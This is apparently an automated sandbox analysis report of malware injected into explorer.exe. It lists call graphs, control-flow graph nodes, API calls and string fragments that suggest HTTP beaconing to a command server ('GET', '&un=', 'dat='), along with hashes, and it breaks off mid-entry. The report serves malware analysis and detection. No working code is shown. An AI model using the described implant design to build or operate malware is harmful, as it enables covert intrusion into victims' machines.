8697480 13854->13855 13856 86938f2 NtProtectVirtualMemory 13855->13856 13856->13852 13858 86938f2 NtProtectVirtualMemory 13857->13858 13859 8697597 13857->13859 13858->13859 13860 86938f2 NtProtectVirtualMemory 13859->13860 13862 86975bf 13859->13862 13860->13862 13861 86976e1 13863 869a382 ObtainUserAgentString 13861->13863 13864 86938f2 NtProtectVirtualMemory 13862->13864 13865 86976b9 13862->13865 13866 86976e9 13863->13866 13864->13865 13865->13861 13867 86938f2 NtProtectVirtualMemory 13865->13867 13867->13861 13788 869fe0a 13789 869e942 13788->13789 13790 869fe45 NtProtectVirtualMemory 13789->13790 13791 869fe70 13790->13791 13916 869814a 13917 8698153 13916->13917 13922 8698174 13916->13922 13919 869a382 ObtainUserAgentString 13917->13919 13918 86981e7 13920 869816c 13919->13920 13921 86930f2 6 API calls 13920->13921 13921->13922 13922->13918 13924 86931f2 13922->13924 13925 869320f 13924->13925 13929 86932c9 13924->13929 13926 869df12 7 API calls 13925->13926 13928 8693242 13925->13928 13926->13928 13927 8693289 13927->13929 13930 86930f2 6 API calls 13927->13930 13928->13927 13931 8694432 NtCreateFile 13928->13931 13929->13922 13930->13929 13931->13927 13749 86a0a4d 13750 86a0a53 13749->13750 13753 8694782 13750->13753 13752 86a0a6b 13755 869478f 13753->13755 13754 86947ad 13754->13752 13755->13754 13757 8699662 13755->13757 13758 869966b 13757->13758 13766 86997ba 13757->13766 13759 86930f2 6 API calls 13758->13759 13758->13766 13761 86996ee 13759->13761 13760 8699750 13763 869983f 13760->13763 13765 8699791 13760->13765 13760->13766 13761->13760 13762 869ef82 6 API calls 13761->13762 13762->13760 13764 869ef82 6 API calls 13763->13764 13763->13766 13764->13766 13765->13766 13767 869ef82 6 API calls 13765->13767 13766->13754 13767->13766 13737 869ef82 13738 869efb8 13737->13738 13739 869b5b2 socket 13738->13739 13741 869f081 13738->13741 13748 869f022 13738->13748 13739->13741 13740 869f134 13742 869b732 connect 13740->13742 13744 869f1b2 13740->13744 13740->13748 13741->13740 13743 869f117 getaddrinfo 13741->13743 13741->13748 13742->13744 13743->13740 13745 869b6b2 send 13744->13745 13744->13748 13747 869f729 13745->13747 13746 869f7f4 setsockopt recv 13746->13748 13747->13746 13747->13748 13951 8696dd9 13952 8696df0 13951->13952 13953 869a382 ObtainUserAgentString 13952->13953 13954 8696ecd 13952->13954 13953->13954 13486 86932dd 13490 869331a 13486->13490 13487 86933fa 13488 8693328 SleepEx 13488->13488 13488->13490 13490->13487 13490->13488 13493 869df12 13490->13493 13502 8694432 13490->13502 13512 86930f2 13490->13512 13497 869df48 13493->13497 13494 869e134 13494->13490 13495 869e232 NtCreateFile 13495->13497 13496 869e0e9 13499 869e125 13496->13499 13530 869d842 13496->13530 13497->13494 13497->13495 13497->13496 13518 869ef82 13497->13518 13538 869d922 13499->13538 13503 869445b 13502->13503 13511 86944c9 13502->13511 13504 869e232 NtCreateFile 13503->13504 13503->13511 13505 8694496 13504->13505 13506 86944c5 13505->13506 13559 8694082 13505->13559 13508 869e232 NtCreateFile 13506->13508 13506->13511 13508->13511 13509 86944b6 13509->13506 13568 8693f52 13509->13568 13511->13490 13513 8693109 13512->13513 13514 86931d3 13512->13514 13573 8693012 13513->13573 13514->13490 13516 8693113 13516->13514 13517 869ef82 6 API calls 13516->13517 13517->13514 13519 869efb8 13518->13519 13522 869f081 13519->13522 13529 869f022 13519->13529 13546 869b5b2 13519->13546 13521 869f134 13525 869f1b2 13521->13525 13521->13529 13549 869b732 13521->13549 13522->13521 13524 869f117 getaddrinfo 13522->13524 13522->13529 13524->13521 13525->13529 13552 869b6b2 13525->13552 13527 869f7f4 setsockopt recv 13527->13529 13528 869f729 13528->13527 13528->13529 13529->13497 13531 869d86d 13530->13531 13555 869e232 13531->13555 13533 869d906 13533->13496 13534 869d888 13534->13533 13535 869d8c5 13534->13535 13536 869ef82 6 API calls 13534->13536 13535->13533 13537 869e232 NtCreateFile 13535->13537 13536->13535 13537->13533 13539 869d9c2 13538->13539 13540 869e232 NtCreateFile 13539->13540 13544 869d9d6 13540->13544 13541 869da9f 13541->13494 13542 869da5d 13542->13541 13543 869e232 NtCreateFile 13542->13543 13543->13541 13544->13541 13544->13542 13545 869ef82 6 API calls 13544->13545 13545->13542 13547 869b60a socket 13546->13547 13548 869b5ec 13546->13548 13547->13522 13548->13547 13550 869b788 connect 13549->13550 13551 869b76a 13549->13551 13550->13525 13551->13550 13553 869b705 send 13552->13553 13554 869b6e7 13552->13554 13553->13528 13554->13553 13557 869e25c 13555->13557 13558 869e334 13555->13558 13556 869e410 NtCreateFile 13556->13558 13557->13556 13557->13558 13558->13534 13560 8694420 13559->13560 13561 86940aa 13559->13561 13560->13509 13561->13560 13562 869e232 NtCreateFile 13561->13562 13564 86941f9 13562->13564 13563 86943df 13563->13509 13564->13563 13565 869e232 NtCreateFile 13564->13565 13566 86943c9 13565->13566 13567 869e232 NtCreateFile 13566->13567 13567->13563 13569 8693f70 13568->13569 13570 8693f84 13568->13570 13569->13506 13571 869e232 NtCreateFile 13570->13571 13572 8694046 13571->13572 13572->13506 13575 8693031 13573->13575 13574 86930cd 13574->13516 13575->13574 13576 869ef82 6 API calls 13575->13576 13576->13574 13868 8696edd 13870 8696f06 13868->13870 13869 8696fa4 13870->13869 13871 86938f2 NtProtectVirtualMemory 13870->13871 13872 8696f9c 13871->13872 13873 869a382 ObtainUserAgentString 13872->13873 13873->13869 13792 86a0a1f 13793 86a0a25 13792->13793 13796 86945f2 13793->13796 13795 86a0a3d 13797 86945fb 13796->13797 13798 869460e 13796->13798 13797->13798 13799 8699662 6 API calls 13797->13799 13798->13795 13799->13798 13800 8694613 13801 8694620 13800->13801 13802 869467e 13801->13802 13803 869fe12 NtProtectVirtualMemory 13801->13803 13803->13801 13729 869fe12 13730 869fe45 NtProtectVirtualMemory 13729->13730 13731 869e942 13729->13731 13732 869fe70 13730->13732 13731->13730 13874 8698cd4 13876 8698cd8 13874->13876 13875 8699022 13876->13875 13877 8698352 NtCreateFile 13876->13877 13878 8698f0d 13877->13878 13878->13875 13879 8698792 NtCreateFile 13878->13879 13879->13878

                                                          Executed Functions

                                                          Function 0869EF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 869ef82-869efb6 1 869efb8-869efbc 0->1 2 869efd6-869efd9 0->2 1->2 3 869efbe-869efc2 1->3 4 869efdf-869efed 2->4 5 869f8fe-869f90c 2->5 3->2 6 869efc4-869efc8 3->6 7 869eff3-869eff7 4->7 8 869f8f6-869f8f7 4->8 6->2 11 869efca-869efce 6->11 9 869eff9-869effd 7->9 10 869efff-869f000 7->10 8->5 9->10 12 869f00a-869f010 9->12 10->12 11->2 13 869efd0-869efd4 11->13 14 869f03a-869f060 12->14 15 869f012-869f020 12->15 13->2 13->4 16 869f068-869f07c call 869b5b2 14->16 17 869f062-869f066 14->17 15->14 18 869f022-869f026 15->18 22 869f081-869f0a2 16->22 17->16 19 869f0a8-869f0ab 17->19 18->8 21 869f02c-869f035 18->21 23 869f0b1-869f0b8 19->23 24 869f144-869f150 19->24 21->8 22->19 25 869f8ee-869f8ef 22->25 27 869f0ba-869f0dc call 869e942 23->27 28 869f0e2-869f0f5 23->28 24->25 26 869f156-869f165 24->26 25->8 29 869f17f-869f18f 26->29 30 869f167-869f178 call 869b552 26->30 27->28 28->25 32 869f0fb-869f101 28->32 34 869f191-869f1ad call 869b732 29->34 35 869f1e5-869f21b 29->35 30->29 32->25 37 869f107-869f109 32->37 43 869f1b2-869f1da 34->43 40 869f22d-869f231 35->40 41 869f21d-869f22b 35->41 37->25 42 869f10f-869f111 37->42 45 869f233-869f245 40->45 46 869f247-869f24b 40->46 44 869f27f-869f280 41->44 42->25 47 869f117-869f132 getaddrinfo 42->47 43->35 49 869f1dc-869f1e1 43->49 48 869f283-869f2e0 call 869fd62 call 869c482 call 869be72 call 86a0002 44->48 45->44 50 869f24d-869f25f 46->50 51 869f261-869f265 46->51 47->24 52 869f134-869f13c 47->52 63 869f2e2-869f2e6 48->63 64 869f2f4-869f354 call 869fd92 48->64 49->35 50->44 53 869f26d-869f279 51->53 54 869f267-869f26b 51->54 52->24 53->44 54->48 54->53 63->64 66 869f2e8-869f2ef call 869c042 63->66 69 869f35a-869f396 call 869fd62 call 86a0262 call 86a0002 64->69 70 869f48c-869f4b8 call 869fd62 call 86a0262 64->70 66->64 85 869f398-869f3b7 call 86a0262 call 86a0002 69->85 86 869f3bb-869f3e9 call 86a0262 * 2 69->86 79 869f4d9-869f590 call 86a0262 * 3 call 86a0002 * 2 call 869c482 70->79 80 869f4ba-869f4d5 70->80 112 869f595-869f5b9 call 86a0262 79->112 80->79 85->86 100 869f3eb-869f410 call 86a0002 call 86a0262 86->100 101 869f415-869f41d 86->101 100->101 105 869f41f-869f425 101->105 106 869f442-869f448 101->106 109 869f467-869f487 call 86a0262 105->109 110 869f427-869f43d 105->110 111 869f44e-869f456 106->111 106->112 109->112 110->112 111->112 116 869f45c-869f45d 111->116 121 869f5bb-869f5cc call 86a0262 call 86a0002 112->121 122 869f5d1-869f6ad call 86a0262 * 7 call 86a0002 call 869fd62 call 86a0002 call 869be72 call 869c042 112->122 116->109 133 869f6af-869f6b3 121->133 122->133 135 869f6ff-869f72d call 869b6b2 133->135 136 869f6b5-869f6fa call 869b382 call 869b7b2 133->136 143 869f75d-869f761 135->143 144 869f72f-869f735 135->144 158 869f8e6-869f8e7 136->158 148 869f90d-869f913 143->148 149 869f767-869f76b 143->149 144->143 147 869f737-869f74c 144->147 147->143 152 869f74e-869f754 147->152 153 869f779-869f784 148->153 154 869f919-869f920 148->154 155 869f8aa-869f8df call 869b7b2 149->155 156 869f771-869f773 149->156 152->143 159 869f756 152->159 160 869f786-869f793 153->160 161 869f795-869f796 153->161 154->160 155->158 156->153 156->155 158->25 159->143 160->161 164 869f79c-869f7a0 160->164 161->164 167 869f7b1-869f7b2 164->167 168 869f7a2-869f7af 164->168 170 869f7b8-869f7c4 167->170 168->167 168->170 173 869f7f4-869f861 setsockopt recv 170->173 174 869f7c6-869f7ef call 869fd92 call 869fd62 170->174 176 869f8a3-869f8a4 173->176 177 869f863 173->177 174->173 176->155 177->176 181 869f865-869f86a 177->181 181->176 184 869f86c-869f872 181->184 184->176 186 869f874-869f8a1 184->186 186->176 186->177
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: getaddrinforecvsetsockopt
                                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                          • API String ID: 1564272048-1117930895
                                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                          • Instruction ID: 75da473bbc136d20dcd9351f8dc7f04b281aa10a0101d8ea7d12964ff9f2fd36
                                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                          • Instruction Fuzzy Hash: 9F52B434614B088FCB69EF68D4847E9B7E5FB54301F52452EC49FCB282DE30A54ACB85
                                                          Function 0869E232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 303 869e232-869e256 304 869e8bd-869e8cd 303->304 305 869e25c-869e260 303->305 305->304 306 869e266-869e2a0 305->306 307 869e2bf 306->307 308 869e2a2-869e2a6 306->308 310 869e2c6 307->310 308->307 309 869e2a8-869e2ac 308->309 311 869e2ae-869e2b2 309->311 312 869e2b4-869e2b8 309->312 313 869e2cb-869e2cf 310->313 311->310 312->313 314 869e2ba-869e2bd 312->314 315 869e2f9-869e30b 313->315 316 869e2d1-869e2f7 call 869e942 313->316 314->313 320 869e378 315->320 321 869e30d-869e332 315->321 316->315 316->320 324 869e37a-869e3a0 320->324 322 869e3a1-869e3a8 321->322 323 869e334-869e33b 321->323 327 869e3aa-869e3d3 call 869e942 322->327 328 869e3d5-869e3dc 322->328 325 869e33d-869e360 call 869e942 323->325 326 869e366-869e370 323->326 325->326 326->320 332 869e372-869e373 326->332 327->320 327->328 329 869e3de-869e40a call 869e942 328->329 330 869e410-869e458 NtCreateFile call 869e172 328->330 329->320 329->330 339 869e45d-869e45f 330->339 332->320 339->320 340 869e465-869e46d 339->340 340->320 341 869e473-869e476 340->341 342 869e478-869e481 341->342 343 869e486-869e48d 341->343 342->324 344 869e48f-869e4b8 call 869e942 343->344 345 869e4c2-869e4ec 343->345 344->320 352 869e4be-869e4bf 344->352 350 869e8ae-869e8b8 345->350 351 869e4f2-869e4f5 345->351 350->320 353 869e4fb-869e4fe 351->353 354 869e604-869e611 351->354 352->345 355 869e55e-869e561 353->355 356 869e500-869e507 353->356 354->324 361 869e567-869e572 355->361 362 869e616-869e619 355->362 358 869e509-869e532 call 869e942 356->358 359 869e538-869e559 356->359 358->320 358->359 366 869e5e9-869e5fa 359->366 367 869e5a3-869e5a6 361->367 368 869e574-869e59d call 869e942 361->368 364 869e6b8-869e6bb 362->364 365 869e61f-869e626 362->365 370 869e739-869e73c 364->370 371 869e6bd-869e6c4 364->371 373 869e628-869e651 call 869e942 365->373 374 869e657-869e66b call 869fe92 365->374 366->354 367->320 369 869e5ac-869e5b6 367->369 368->320 368->367 369->320 376 869e5bc-869e5e6 369->376 380 869e742-869e749 370->380 381 869e7c4-869e7c7 370->381 377 869e6f5-869e734 371->377 378 869e6c6-869e6ef call 869e942 371->378 373->320 373->374 374->320 395 869e671-869e6b3 374->395 376->366 401 869e894-869e8a9 377->401 378->350 378->377 387 869e74b-869e774 call 869e942 380->387 388 869e77a-869e7bf 380->388 381->320 384 869e7cd-869e7d4 381->384 390 869e7fc-869e803 384->390 391 869e7d6-869e7f6 call 869e942 384->391 387->350 387->388 388->401 399 869e82b-869e835 390->399 400 869e805-869e825 call 869e942 390->400 391->390 395->324 399->350 405 869e837-869e83e 399->405 400->399 401->324 405->350 408 869e840-869e886 405->408 408->401
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: `
                                                          • API String ID: 823142352-2679148245
                                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                          • Instruction ID: 04841658f33d82449147b628189d5aadb1c974df26d279c0037e2aa24feafeea
                                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                          • Instruction Fuzzy Hash: 18225B70A18B09DFCB59DF68C4956AAF7E5FB58302F41022ED09ED7290DB71E452CB81
                                                          Function 0869FE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 447 869fe12-869fe38 448 869fe45-869fe6e NtProtectVirtualMemory 447->448 449 869fe40 call 869e942 447->449 450 869fe7d-869fe8f 448->450 451 869fe70-869fe7c 448->451 449->448
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0869FE67
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                          • Instruction ID: f3315c3b1640e264edcf19a1f613ee43a300d4bb3ca6c89ea72e1840d13cee6e
                                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                          • Instruction Fuzzy Hash: 3401B134668B484F8B88EF6CE48012AB7E4FBCD315F000B3EE99AC3254EB70C5414742
                                                          Function 0869FE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 452 869fe0a-869fe6e call 869e942 NtProtectVirtualMemory 455 869fe7d-869fe8f 452->455 456 869fe70-869fe7c 452->456
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0869FE67
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                          • Instruction ID: 52f1f3cb71a8d622605482237e10a76a2ae4b43bbcc29d2228e4ecd6fd5feed4
                                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                          • Instruction Fuzzy Hash: 7F01A734628B884B8B44EB6C94411A6B3E5FBCE315F000B3EE5DAC3241DB61D5024782
                                                          Function 086998C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • ObtainUserAgentString.URLMON ref: 086999A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: AgentObtainStringUser
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 2681117516-319646191
                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction ID: 17131229e0227eb9e50b36660f75703e1757a8999a8af06763cbd6f6a9806ef8
                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                          • Instruction Fuzzy Hash: CF319F31614A0C8ECF44EFA8C8847EDBBE5FB58216F45422ED45ED7340DE7886458B89
                                                          Function 086998BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • ObtainUserAgentString.URLMON ref: 086999A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: AgentObtainStringUser
                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                          • API String ID: 2681117516-319646191
                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction ID: cc72d18ed8bdb696bd01337d65cc95aa0d5c91c42f351d6ec37ae07d38845d41
                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                          • Instruction Fuzzy Hash: E4219170614B4C8ECF45EFA8C8847EDBBA5FF58206F45422EE45AD7380DE7486458B8A
                                                          Function 08695B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 232 8695b66-8695b68 233 8695b6a-8695b6b 232->233 234 8695b93-8695bb8 232->234 235 8695b6d-8695b71 233->235 236 8695bbe-8695c22 call 869c612 call 869e942 * 2 233->236 237 8695bbb-8695bbc 234->237 235->237 238 8695b73-8695b92 235->238 246 8695c28-8695c2b 236->246 247 8695cdc 236->247 237->236 238->234 246->247 248 8695c31-8695cd3 call 86a0da4 call 86a0022 call 86a03e2 call 86a0022 call 86a03e2 CreateMutexW 246->248 249 8695cde-8695cf6 247->249 248->247 263 8695cd5-8695cda 248->263 263->249
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateMutex
                                                          • String ID: .dll$el32$kern
                                                          • API String ID: 1964310414-1222553051
                                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                          • Instruction ID: b3bc8922a6e7aea83cf40e959cbce03e928bcc964c9a27b94fef59d76b605736
                                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                          • Instruction Fuzzy Hash: 22417A74918A08CFCF95EFA8C8D87AD77E0FB58301F05426EC84ADB295EA309945CB85
                                                          Function 08695B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: CreateMutex
                                                          • String ID: .dll$el32$kern
                                                          • API String ID: 1964310414-1222553051
                                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                          • Instruction ID: 35a69c5f56898889107beb3c9ca9c5fedac320a17e796face0c9b8fbd846ebc5
                                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                          • Instruction Fuzzy Hash: ED412974918A08CFDF94EFA8C498BAD77E4FB68301F05416EC84ADB256DE309945CB85
                                                          Function 0869B72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 293 869b72e-869b768 294 869b788-869b7ab connect 293->294 295 869b76a-869b782 call 869e942 293->295 295->294
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: connect
                                                          • String ID: conn$ect
                                                          • API String ID: 1959786783-716201944
                                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                          • Instruction ID: b3c59088ae8b100b415ef366c3ac675e85dd7a408d3adeff98605a7c0df00845
                                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                          • Instruction Fuzzy Hash: 0C015E30618B188FCB84EF5CE088B55B7E0FB58325F1545AED94DCB266C674C8818BC2
                                                          Function 0869B732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 298 869b732-869b768 299 869b788-869b7ab connect 298->299 300 869b76a-869b782 call 869e942 298->300 300->299
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: connect
                                                          • String ID: conn$ect
                                                          • API String ID: 1959786783-716201944
                                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                          • Instruction ID: 160db7243964612df0d6f2f4ed6eb64851df70dd7ef760aa4ede8a766d065c4b
                                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                          • Instruction Fuzzy Hash: 90012170618A1C8FCB84EF5CE088B5577E0FB59315F1541AE994DCB266C674C9818BC2
                                                          Function 0869B6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 411 869b6b2-869b6e5 412 869b705-869b72d send 411->412 413 869b6e7-869b6ff call 869e942 411->413 413->412
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: send
                                                          • API String ID: 2809346765-2809346765
                                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                          • Instruction ID: 512ddad87178f00cea1077902ba49f30076671b76d8d0128113dfcab188a3527
                                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                          • Instruction Fuzzy Hash: 6D011270518A188FDBC4EF5CE088B2577E0EB58315F1646AED85DCB366D670D8818B85
                                                          Function 0869B5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 416 869b5b2-869b5ea 417 869b60a-869b62b socket 416->417 418 869b5ec-869b604 call 869e942 416->418 418->417
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: sock
                                                          • API String ID: 98920635-2415254727
                                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                          • Instruction ID: 71cae5d1c74909a86df2fd466668fd9cf36a8f4d7975232164fe6b6e012f1b87
                                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                          • Instruction Fuzzy Hash: 2301713061861C8FCB84EF1CE048B50BBE0FB59314F1545AED45ECB366C7B0C9818B86
                                                          Function 086932DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 421 86932dd-8693320 call 869e942 424 86933fa-869340e 421->424 425 8693326 421->425 426 8693328-8693339 SleepEx 425->426 426->426 427 869333b-8693341 426->427 428 869334b-8693352 427->428 429 8693343-8693349 427->429 431 8693370-8693376 428->431 432 8693354-869335a 428->432 429->428 430 869335c-869336a call 869df12 429->430 430->431 434 8693378-869337e 431->434 435 86933b7-86933bd 431->435 432->430 432->431 434->435 437 8693380-869338a 434->437 438 86933bf-86933cf call 8693e72 435->438 439 86933d4-86933db 435->439 437->435 442 869338c-86933b1 call 8694432 437->442 438->439 439->426 441 86933e1-86933f5 call 86930f2 439->441 441->426 442->435
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3739967794.0000000008650000.00000040.80000000.00040000.00000000.sdmp, Offset: 08650000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_8650000_explorer.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                          • Instruction ID: 345d4f07852bed69867326e0bb582c728860243eec0cd0f7007fd6f8a0f9b9c4
                                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                          • Instruction Fuzzy Hash: DF318874644B89DADF64EF2981882A5B3A4FB44302F46527FC9ADCA386CB309455CFD1
                                                          Function 08693412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
